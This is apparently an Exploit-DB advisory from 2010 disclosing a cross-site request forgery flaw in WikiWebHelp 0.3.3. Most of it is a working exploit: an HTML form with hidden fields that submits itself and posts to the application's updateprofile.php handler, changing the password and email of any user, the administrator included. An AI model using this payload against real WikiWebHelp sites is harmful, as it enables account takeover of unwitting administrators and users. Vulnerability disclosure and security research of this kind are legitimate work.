[] NeoSense

WikiWebHelp 0.3.3 - Cross-Site Request Forgery

Author: Yoyahack
type: webapps
platform: php
port: 
date_added: 2010-10-12 
date_updated: 2010-10-13 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwwh-0.3.3.zip

#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: yoyahack@undersecurity.net
#CMS: WikiWebHelp

The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...

Example

Change the password of users, including the administrator.

Exploit:

<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
<script>document.CSRF.submit()</script>